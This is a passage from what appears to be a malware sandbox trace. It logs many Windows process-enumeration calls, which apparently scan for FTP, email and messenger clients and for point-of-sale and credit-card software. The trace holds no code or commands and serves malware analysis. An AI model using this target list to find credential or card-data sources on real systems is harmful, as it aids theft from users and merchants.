cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0221.312] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0221.314] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0221.317] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0221.319] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0221.321] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0221.436] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0221.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0221.440] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0221.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0221.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0221.447] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0221.453] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0221.456] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0221.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0221.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0221.463] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0221.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0221.472] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0221.474] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0221.476] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0221.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0221.479] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0221.639] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0221.641] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0221.642] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0221.644] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0221.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0221.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0221.648] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0221.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0221.652] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0221.657] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0221.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0221.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0221.663] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.665] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.670] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.672] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0221.674] CloseHandle (hObject=0x1018) returned 1 [0221.674] Sleep (dwMilliseconds=0x64) [0221.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0221.802] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.804] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.805] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.810] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.813] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.815] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.817] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.818] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.820] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.822] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.827] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.829] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.833] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.835] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.837] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.842] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.844] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.846] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.848] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.850] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.852] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.859] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.861] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.862] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.864] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.866] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.868] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.870] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.874] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.876] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.884] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.886] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.888] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.890] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0221.892] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0221.894] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0221.896] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0221.897] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0221.899] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0221.904] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0221.906] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0221.908] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0221.909] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0221.911] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0221.913] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0221.915] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: 